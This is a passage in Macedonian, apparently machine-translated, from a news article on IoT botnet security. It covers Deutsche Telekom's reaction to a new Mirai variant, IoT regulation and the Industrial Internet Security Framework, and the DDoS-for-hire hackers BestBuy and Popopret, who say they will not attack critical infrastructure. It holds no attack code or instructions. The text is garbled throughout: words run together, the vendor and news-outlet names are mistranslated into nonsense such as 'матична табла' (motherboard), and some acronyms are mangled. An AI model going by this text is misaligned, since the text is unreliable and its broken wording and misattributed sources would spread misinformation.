Како што споменавме погоре, само развивачите на крајните уреди или провајдерите што ги обезбедуваат (во случај на рутери) можат да ги заштитат корисниците од понапредни ботнети. Германскиот интернет провајдер Дојче Телеком, кој беше погоден од новата верзија на Мираи, веќе најави дека ќе ги „преиспита деловните односи“ со добавувачите на ранливи рутери. speedport, компанија Аркадски.

На крајот на краиштата, ќе може да се зголеми нивото на безбедност на Интернет на нештата преку воведување построга контрола на уредите од провајдерите, од една страна, и развој на стандарди и регулаторна документација за IoT, од друга страна. Слични мерки веќе се преземени во многу земји за да се осигури безбедноста на APCS. Првите чекори во оваа насока се веќе преземени - на пример, неколку продавачи на ИТ објавија документ во септември со наслов Индустрискиот интернет безбедностРамка (IISF)- предлага Интернетот на нештата да се смета како дел од „индустрискиот интернет“.

Сепак, конечното решение на проблемот е сè уште далеку, а хакерите BestBuy и Popopretможе да добие монопол на големи DDoS нападионлајн. Ова е прилично тажен факт, но самите провалници, за време на разговор со матична таблаизјавија дека во нивните активности ќе се водат не само од профитот, туку и од моралните принципи. Така, BestBuy изјави дека нема да им дозволат на клиентите да ги напаѓаат IP адресите на компаниите кои работат со критична инфраструктура.